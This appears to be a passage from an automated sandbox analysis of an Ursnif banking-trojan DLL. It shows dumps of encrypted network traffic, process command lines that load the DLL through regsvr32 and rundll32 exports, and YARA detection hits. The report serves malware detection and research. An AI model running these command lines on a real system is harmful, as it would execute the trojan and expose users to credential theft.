                                        2021-09-10 09:33:46 UTC179INData Raw: 48 03 81 c0 37 44 dd 70 7f 4f 5a 9c ac 16 c8 3f 6c 3f 7a c6 6f ea 9c 78 47 85 2b 71 66 0c fe 6d ae 63 4a e5 1c a2 fa cd eb ed 67 d7 3a 9c d3 65 bc c3 1f 1d 8a c3 0f ed db 6c 08 6d a8 d5 2c 53 0a da 18 06 17 7c f5 b0 e0 38 54 49 4b d2 cc dc b7 ed e3 e7 bf 51 e2 15 3d 65 9c 02 7e 4f 7b c5 57 d7 34 8f ba 6c 64 2b ee 5b 67 02 3d 8e ed 4e ec 09 b6 bd 84 22 80 6b 83 5d 5f f0 f3 12 90 30 9b 8f d6 ba bb b6 db c5 34 e1 84 90 da 6e d4 1a fa 7a 18 5e 6b 3a 2a 4f 9b 89 a6 e3 46 d3 66 65 81 8e a8 b7 ed 77 60 ac c4 00 49 65 2d ed e2 bf bf 56 12 a6 04 62 98 ec c9 77 a1 0e d9 57 93 8a 53 3b 83 4d c4 4b 33 95 2d 38 5c 95 55 a8 c1 ea ed a5 5e af e4 22 ce 7a d2 08 fd 2d e8 5f 4d 7d 3d c3 d8 19 57 13 2f 53 60 e8 49 65 4f b8 cb de a0 82 c4 00 aa 43 82 db 8a 8f 17 d5 47 0f 34
                                        Data Ascii: H7DpOZ?l?zoxG+qfmcJg:elm,S|8TIKQ=e~O{W4ld+[g=N"k]_04nz^k:*OFfew`Ie-VbwWS;MK3-8\U^"z-_M}=W/S`IeOCG4
                                        2021-09-10 09:33:46 UTC181INData Raw: cc 03 48 dc 9e 1f 8a 06 ba 92 26 15 64 e4 3f c6 83 f7 f3 09 d2 d0 b5 50 1b b8 62 5d 80 6a 88 ec ab 4c 56 30 c1 bd af b8 55 8f 6b 01 f8 23 c1 24 78 e3 ad 91 99 5a 36 cf 78 f9 d2 bf 89 3c bc df f5 18 04 e6 b7 55 90 28 f2 3f 07 c9 ff 00 4e bc 56 4d 1b 6b f2 fd c0 63 04 53 2b 33 48 ec a7 7b 50 5a da 01 5e 3f 75 9f 1c 73 ff 00 d3 a8 a5 45 21 87 3a f7 9c 75 25 8d 03 98 c1 24 89 8f 2e 54 cd 6b 70 9f d4 b0 41 e0 d0 66 fc fc 0b ae 3f 9e a0 28 92 59 ae 5b e2 0d 2c e2 2c 68 da 50 e6 4f 77 f6 8a 73 eb 7c 95 81 f2 86 d9 36 ca f9 33 6e 60 09 12 24 f1 90 77 f2 6c fb 94 d7 1b 6c f8 f2 ac c5 95 13 fe 35 15 17 61 cc 75 cb 2e 70 c9 a8 01 ed 9f 57 ab 36 bd de 13 da 2c 91 9d 6b 27 35 e7 28 cf 0c 92 c7 ee b5 ee 22 d2 02 7f cc b7 cd 0f 06 ee 8f 51 52 d2 95 24 1a b8 2c 4e c6 9e
                                        Data Ascii: H&d?Pb]jLV0Uk#$xZ6x<U(?NVMkcS+3H{PZ^?usE!:u%$.TkpAf?(Y[,,hPOws|63n`$wll5au.pW6,k'5("QR$,N
                                        2021-09-10 09:33:46 UTC182INData Raw: af 09 70 4f 76 3d 1b de 29 04 b0 a4 24 12 43 3f b9 fc c4 c6 81 ad e7 68 5a 8e 2e a7 a7 cf 24 19 38 87 70 64 34 19 54 ab 34 6c 7c 94 75 07 70 15 63 8f 8e 94 e2 e4 27 8a 94 b9 6b 03 c7 47 cc 12 18 1e 96 ab d1 fa 33 c3 71 2b e0 a7 21 68 3e 10 52 e9 25 83 3b 1d 5b fa d2 3a 03 f4 c3 ea 76 37 a8 b0 a0 9a 39 7f e3 20 55 6c bc 31 cb 7b 8d 17 52 78 2b c1 20 af 2a 38 3e 39 f9 ff 00 1d f4 e5 f0 d3 30 28 28 24 13 85 6d fc b5 db 7f 28 fa 7f d3 7e a2 9e 2a 4c b2 92 eb 61 89 24 b0 48 d1 ee 5c d2 b4 d2 91 6a bd 3b ea 94 98 aa ab ad a6 cb 43 5e e5 20 30 00 12 19 4f ce e1 cd fc 75 43 3f 87 b9 4e 2c ae 3b f8 f9 8d 2c b5 f8 45 43 90 29 de d4 f9 78 b6 9f 4d 3d 6a b1 c9 0c 6e fb 95 94 6e 56 60 76 00 39 0c 4d 6e bf 81 f9 fc f5 4b c5 c8 c6 08 a8 2c 6d 5c a9 b8 70 2b d2 2e f8 49
                                        Data Ascii: pOv=)$C?hZ.$8pd4T4l|upc'kG3q+!h>R%;[:v79 Ul1{Rx+ *8>90(($m(~*La$H\j;C^ 0OuC?N,;,EC)xM=jnnV`v9MnK,m\p+.I
                                        2021-09-10 09:33:46 UTC183INData Raw: e7 bd 69 bf 38 00 d7 32 5c 65 54 8e ad 12 39 91 69 82 15 fc 46 c0 80 4f c1 bf c7 f3 d2 eb 96 49 7a f8 6d 43 5a dd fa f2 d6 8c c2 05 8b c2 cf d4 ba b4 51 c4 aa b2 a2 97 25 84 7b 8f 80 47 1b 45 32 ad 9e 4f ff 00 2a e8 fc 22 59 4a c5 9f 2a 30 b0 36 bc 41 65 64 95 06 02 9d 28 75 e5 f8 ce 14 fa 96 ac d1 09 37 cc a1 99 82 28 56 a5 50 ff 00 f4 9a 04 d7 21 99 7e 3f 9b eb 86 50 c4 a2 c0 78 9d d9 c9 de ba ff 00 59 40 c4 d2 09 04 87 c9 9c 53 fb 16 78 54 7a 8b d4 f2 46 db 44 c3 ee 25 66 0c 8c c1 51 58 9d bb ad 47 2b b4 02 17 93 43 9e 6e e5 2c 10 a0 e5 c3 86 d9 af e7 b0 e7 ac 20 b9 ea 33 14 30 03 bb 9a 6d 7f c8 f9 4f 7a 97 d4 51 61 c6 56 4c d0 ce ca c5 dc be d5 dc 3c 46 dc 1d a8 7c 81 43 c0 17 c5 f5 60 53 88 61 01 ed 7a e7 53 97 3e 50 13 3f 0f 8c 80 1b 76 ef bd 22 a5
                                        Data Ascii: i82\eT9iFOIzmCZQ%{GE2O*"YJ*06Aed(u7(VP!~?PxY@SxTzFD%fQXG+Cn, 30mOzQaVL<F|C`SazS>P?v"
                                        2021-09-10 09:33:46 UTC184INData Raw: e0 91 b5 8c 91 cf e2 e9 89 d9 28 06 ff 00 e9 24 13 e4 75 25 ac 39 21 46 ac 58 6e 1c e6 79 57 ce 22 99 58 cb e0 14 39 1a d3 41 6d ea cf 78 65 63 61 cc b8 78 8f b7 15 b2 4c 52 48 92 ee 1b 5b 1a 25 fb 69 a1 7e 06 e9 a1 28 e0 c7 fb b6 95 26 fa aa 9e 14 54 ce e1 45 ce a1 98 d3 cc f9 65 0f cb 04 a1 94 00 c3 6d de b9 e9 a0 cc c6 d0 9d 66 c5 d5 b1 f0 e2 1d 8f b2 cb 85 a3 ae e2 f6 e3 c7 8d 15 c3 1b a2 c3 73 0f 8a 1f c7 56 52 cb a6 5b 96 a0 43 de e7 3d fc a1 39 ce 92 4b 50 28 0f 7a fb 5f 66 80 9d 1c 47 97 e9 a4 8a 08 8a 98 23 0c 66 de 48 ed 08 a4 c7 2c 7c 00 50 8d c0 9f 85 37 c8 1d 31 2f c1 38 cb 55 43 31 a5 4e 9b 56 e7 ab 40 56 91 31 04 87 0c 9a b6 45 ff 00 62 bf dc 32 f4 bd 7a 1d 5b 48 d1 06 44 82 17 86 37 d2 33 f2 4b 53 6d c4 60 23 99 80 a7 da 52 5b de d6 08 f1
                                        Data Ascii: ($u%9!FXnyW"X9AmxecaxLRH[%i~(&TEemfsVR[C=9KP(z_fG#fH,|P71/8UC1NV@V1Eb2z[HD73KSm`#R[
                                        2021-09-10 09:33:46 UTC186INData Raw: 62 f1 ac cd 67 85 8e 51 db 3b 08 34 ca ca 85 85 78 1c 9e 4d 75 e4 2f 12 8e 1d 2b 9d 41 be 7b 75 cc 08 e2 c1 09 65 7f 20 7a 0e fd cf 91 8f a5 55 17 32 08 0a a6 fd 73 4a 93 09 05 fe 99 c9 ed bc f1 b3 16 34 19 64 c7 20 0f cb 0e 7c 0e 85 35 4c 4b be 43 d0 9a da b0 69 48 c4 82 c4 0b 33 f9 8f 53 f8 83 1d 3b 1e 5c 8d 3b 23 1e 45 58 be f3 4c ce 8e 02 4e e5 19 11 33 37 2b 5c 78 aa a2 7e 3a 4c ad 26 61 b8 74 a9 22 d7 14 ed b3 87 65 82 94 b3 3b 37 2a 7c ed ad 72 8f 31 c3 f7 ba 7e 21 98 a0 95 21 86 66 90 2e e0 86 12 1f 9f 1b 40 28 47 e7 8f 17 d5 6a 54 53 3a 62 0a 9e 84 8c 39 d4 e6 7d de bb 52 2c 8a 01 e1 c4 ca 31 0c 06 75 7b 8b 5b 78 5f fd 57 d2 d8 ea 39 ab 84 c8 b8 f9 78 b8 59 c8 ac 02 a1 6c 9c 6b 90 86 6f 87 96 30 58 f3 b8 13 60 75 a3 fa 64 e7 61 98 cb 4b 50 fa 3d
                                        Data Ascii: bgQ;4xMu/+A{ue zU2sJ4d |5LKCiH3S;\;#EXLN37+\x~:L&at"e;7*|r1~!!f.@(GjTS:b9}R,1u{[x_W9xYlko0X`udaKP=
                                        2021-09-10 09:33:46 UTC187INData Raw: 9d ac 1c b1 b2 c0 9d 8a 0d 8f 92 84 c2 92 4a 40 2e 34 d7 f1 b4 32 b9 09 52 13 89 24 db 2f 2f 33 53 eb 1a cb ec c7 9d a6 ac 87 52 8d b9 58 90 17 9e d0 50 2c 3d 91 b8 a8 02 f6 db 1a e7 a5 d4 09 14 82 4d 93 89 b0 50 e1 66 57 a5 1b f2 fc e2 1d d9 66 de fb d4 c8 84 5a 48 0e d9 0f c8 6f 01 02 f8 3e 2c 1f 1d 0c a0 80 4b 8e cc 2a a4 99 64 25 44 28 e4 52 43 76 33 11 94 e7 c7 ed dc 12 24 44 05 c2 f0 d2 c8 06 c5 0a 1b 80 3c 73 e4 f1 d0 94 c5 4c 41 7d 9b 9e bf 8f 68 28 90 b6 77 4d 79 fe 28 de ed b4 6b c3 90 ad 10 72 aa c5 da d8 58 dd 19 05 bc 58 f6 f8 3f ef fc 0e bb 85 3a 5f af ef 9c 09 7e 02 c4 87 da b4 fc 76 62 27 36 7d b6 ce 14 42 a0 b0 db 22 aa 87 23 8b 27 f0 6a cf fa f5 10 9c 05 d2 c0 69 6e 9f 88 0a 91 42 c6 f9 0c 88 76 b3 9a 1a 53 e2 07 db 37 1e cb 97 85 d0 31
                                        Data Ascii: J@.42R$//3SRXP,=MPfWfZHo>,K*d%D(RCv3$D<sLA}h(wMy(krXX?:_~vb'6}B"#'jinBvS71
                                        2021-09-10 09:33:46 UTC188INData Raw: 48 4a 48 2e 6a 46 86 da f5 e6 d0 29 28 c3 8d 4a 0f 8a b4 ab 0a b5 d9 ba 73 30 17 e9 fd 2d 63 f5 67 ac 63 31 c8 22 9b d3 d9 59 85 67 49 63 6e f4 ac 32 9b b6 ef 6b 71 31 45 75 e3 e0 fc 8e a5 c4 3a e4 4a 52 48 04 10 92 f5 7a 17 0f 9d 9d d8 e5 91 8e c9 48 54 f5 30 64 e1 76 55 dc 1c 9b 36 39 b8 b4 65 d6 b4 f8 f5 0d 63 4a 8a 45 0d 1e 5e 0c e8 02 8b 3b e5 85 24 2e 11 00 0d b7 6d 1b 35 46 cf 27 a2 f0 aa 98 d4 b3 31 6d 76 e7 9c 7b 8b c2 0d 39 7b 3b f7 93 44 e7 ad 35 59 63 d3 7e 9f 6a 38 58 ae 71 a1 f4 ee 38 d5 32 59 cb 15 93 33 22 47 cc 56 00 5b c9 2b cd 23 b9 71 e1 57 c9 eb c2 51 33 09 5a 81 15 a5 ce 47 4a d9 cd cb 86 6a bc 0d 33 82 10 05 58 d2 95 d7 b2 62 07 48 f4 fa cd 87 ea 18 3e dc a0 38 59 59 b1 db 80 08 82 68 a5 8e 48 c3 54 46 55 8d 0b 01 7d cd 84 ad f0 3a
                                        Data Ascii: HJH.jF)(Js0-cgc1"YgIcn2kq1Eu:JRHzHT0dvU69ecJE^;$.m5F'1mv{9{;D5Yc~j8Xq82Y3"GV[+#qWQ3ZGJj3XbH>8YYhHTFU}:
                                        2021-09-10 09:33:46 UTC189INData Raw: 00 ee 3c 8e 00 eb a8 47 fc 84 bf 80 a8 39 d1 b2 1b 72 bf 48 5a 7a ca 90 90 f5 42 14 08 ea 39 77 e7 15 27 d0 d3 ce 9e b0 f5 ae 66 a0 d2 d4 99 e9 12 d1 f6 47 dd 94 08 9c b7 96 f8 1b 4d 07 37 cf cf 5a 75 ca 2a 12 3e da 5c 78 4e 94 a9 22 a7 2a 53 f0 5b 2d 2f 12 0c e3 b9 0e 4f 23 9d 7d 2b 6d a2 33 17 52 7c 94 fa 90 a6 3f ba 8f 22 58 22 91 5d 01 ee 34 b9 27 19 5d 49 a2 22 4f 69 61 5e d3 c8 fc f4 ca e5 84 84 e4 a0 1d b5 36 a9 0f e7 5d 0d 2f 04 4d 24 aa c5 f4 e7 43 95 77 07 20 c2 ad 0f e9 e0 fb 9f a4 7e 90 58 ca ee 87 47 d5 b0 56 32 c2 c4 ab 2e eb 23 f0 7c 2d 1a 1c dd 75 8e 13 d5 2b ea 0a 41 4d d4 70 d9 8f 7b b5 fc b5 88 97 f7 38 34 b2 98 e8 2c d7 a3 6a e3 a4 57 2d 61 9e 1c 9f 48 e1 e1 21 51 95 24 4f 2b a9 27 66 4c 40 34 b1 b0 07 85 75 52 7e 78 e3 f8 eb 41 c3 14
                                        Data Ascii: <G9rHZzB9w'fGM7Zu*>\xN"*S[-/O#}+m3R|?"X"]4']I"Oia^6]/M$Cw ~XGV2.#|-u+AMp{84,jW-aH!Q$O+'fL@4uR~xA
                                        2021-09-10 09:33:46 UTC191INData Raw: 66 23 74 8a 78 b1 b9 43 06 11 aa 5d f8 5f d4 6f 1b 05 72 6f ae a5 09 49 25 81 24 5e d5 b3 e7 f3 72 cd 17 89 9a e8 c3 85 e9 b0 a1 cc 9c b6 0d d4 43 0f 49 99 5f bb 2e f2 cc 36 ad 50 ed 86 2a 14 ec 52 4e c5 1b 40 51 64 9b be 0d f5 dd 2a 3e 4f 5f d4 01 86 9e 75 83 1c 04 89 80 95 9f 64 b1 82 d1 87 56 91 2c 8a 34 8b fb 79 36 6a b9 f9 ea 4c 82 9a 9a dc 06 cc 58 58 ff 00 51 29 93 7c 00 03 40 c0 b9 a3 8a 1d 29 46 68 31 d2 b5 34 21 dc 4e ae b0 2f ea 05 3b 19 e2 46 40 7b 41 cd 89 0d 9f f4 14 3a 9c 9c ce 4e ef 42 18 33 f4 19 f5 2c 2b 0b cf 92 00 0a 34 c4 c0 6e f5 bf 4c fc c8 86 9e 0c a3 50 8d 8c 6f 06 3a 4d 84 f0 47 24 4a 64 9b 0e 31 3a 4b 3e 46 c0 ea 1e 63 12 f6 44 96 0a 17 b1 f9 ea c2 49 13 10 54 92 e0 12 09 d3 be c4 55 2f c2 bc 27 f9 50 e1 7b 81 7b 53 4d 7c a3 36
                                        Data Ascii: f#txC]_oroI%$^rCI_.6P*RN@Qd*>O_udV,4y6jLXXQ)|@)Fh14!N/;F@{A:NB3,+4nLPo:MG$Jd1:K>FcDITU/'P{{SM|6
                                        2021-09-10 09:33:46 UTC192INData Raw: ed 05 b2 c4 43 7c 2b 2e 26 0c 6c c2 34 ef 65 24 6b 3c a0 b7 04 a4 22 95 aa c1 b1 d6 ae 59 1f 75 22 ec fb e6 3a fc d6 32 13 94 4f 89 41 99 47 a9 63 93 6d fb 8d 3f 43 46 9a 76 26 50 85 03 cd 9b 19 fb 86 53 64 92 01 0c 8e 3d c5 63 5a 0c 3c 1b bf 3e 3d c6 1c 4c 3f c4 0b de c5 d8 65 99 e7 78 f7 d3 92 0a e6 63 ff 00 23 e1 b3 9e 5d 3f 23 58 b5 1e 96 c5 87 03 07 5a c9 2f 24 b0 a6 83 85 8b 28 85 f8 11 77 22 92 54 11 0a 0c ec 58 2d 9e 5e eb c7 3d 66 56 8c 4b 5e 22 cd 88 87 7b 07 66 67 15 a4 6a 64 1c 0d 84 68 1e c0 97 cf 99 a5 2d b4 11 7a fd e1 c8 f4 ae 3e 7b 4a 02 64 66 e9 c6 3f 96 9a 49 93 67 db 85 a2 09 bf d3 62 2a a8 5f 22 fa 5f e9 e1 42 64 c2 68 14 48 15 ff 00 e2 df 22 0d f5 39 aa 32 90 c9 fe 2c 09 d2 94 cf fa e8 c4 6b e9 f6 4a 45 0e 16 54 f1 2a c3 0e af 88 98
                                        Data Ascii: C|+.&l4e$k<"Yu":2OAGcm?CFv&PSd=cZ<>=L?exc#]?#XZ/$(w"TX-^=fVK^"{fgjdh-z>{Jdf?Igb*_"_BdhH"92,kJET*


                                        Code Manipulations

                                        Statistics

                                        CPU Usage

                                        Memory Usage

                                        High Level Behavior Distribution

                                        Behavior

                                        System Behavior

                                        General

                                        Start time:11:33:26
                                        Start date:10/09/2021
                                        Path:C:\Windows\System32\loaddll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:loaddll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll'
                                        Imagebase:0xc80000
                                        File size:116736 bytes
                                        MD5 hash:542795ADF7CC08EFCF675D65310596E8
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391622099.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391468389.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391668872.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391496685.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391695930.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391358945.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.525372552.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391423871.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.391520743.0000000003138000.00000004.00000040.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Start time:11:33:27
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\cmd.exe
                                        Wow64 process (32bit):true
                                        Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1
                                        Imagebase:0x150000
                                        File size:232960 bytes
                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:11:33:27
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                        Wow64 process (32bit):true
                                        Commandline:regsvr32.exe /s C:\Users\user\Desktop\MGrYFpGLQ7.dll
                                        Imagebase:0xc40000
                                        File size:20992 bytes
                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311865061.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311769510.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311540194.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311670564.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311984449.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.312268208.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311633818.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000003.311573394.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000002.00000002.527384744.0000000005538000.00000004.00000040.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Start time:11:33:27
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe 'C:\Users\user\Desktop\MGrYFpGLQ7.dll',#1
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.313451317.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.314268795.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.313872965.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.314181933.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.313395188.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.526965041.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.313701626.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.313576458.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.314078107.0000000004C88000.00000004.00000040.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Start time:11:33:28
                                        Start date:10/09/2021
                                        Path:C:\Program Files\internet explorer\iexplore.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Program Files\Internet Explorer\iexplore.exe
                                        Imagebase:0x7ff648b30000
                                        File size:823560 bytes
                                        MD5 hash:6465CB92B25A7BC1DF8E01D8AC5E7596
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high

                                        General

                                        Start time:11:33:28
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Bighearted
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000002.311422020.0000000006CB8000.00000004.00000040.sdmp, Author: Joe Security
                                        Reputation:high

                                        General

                                        Start time:11:33:29
                                        Start date:10/09/2021
                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17410 /prefetch:2
                                        Imagebase:0xe90000
                                        File size:822536 bytes
                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:11:33:32
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Soaking
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311090164.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311152381.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311345831.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311203958.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311364814.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311042721.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.311282599.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000009.00000003.310694636.00000000070D8000.00000004.00000040.sdmp, Author: Joe Security

                                        General

                                        Start time:11:33:36
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Turnipy
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 0000000C.00000002.328237107.0000000005588000.00000004.00000040.sdmp, Author: Joe Security

                                        General

                                        Start time:11:33:36
                                        Start date:10/09/2021
                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82952 /prefetch:2
                                        Imagebase:0xe90000
                                        File size:822536 bytes
                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:11:33:38
                                        Start date:10/09/2021
                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:17414 /prefetch:2
                                        Imagebase:0xe90000
                                        File size:822536 bytes
                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:11:33:38
                                        Start date:10/09/2021
                                        Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                        Wow64 process (32bit):true
                                        Commandline:'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4728 CREDAT:82954 /prefetch:2
                                        Imagebase:0xe90000
                                        File size:822536 bytes
                                        MD5 hash:071277CC2E3DF41EEEA8013E2AB58D5A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language

                                        General

                                        Start time:11:33:40
                                        Start date:10/09/2021
                                        Path:C:\Windows\SysWOW64\rundll32.exe
                                        Wow64 process (32bit):true
                                        Commandline:rundll32.exe C:\Users\user\Desktop\MGrYFpGLQ7.dll,Watertight
                                        Imagebase:0xba0000
                                        File size:61952 bytes
                                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314377890.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314521084.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314475815.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
                                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000010.00000003.314245766.0000000006878000.00000004.00000040.sdmp, Author: Joe Security
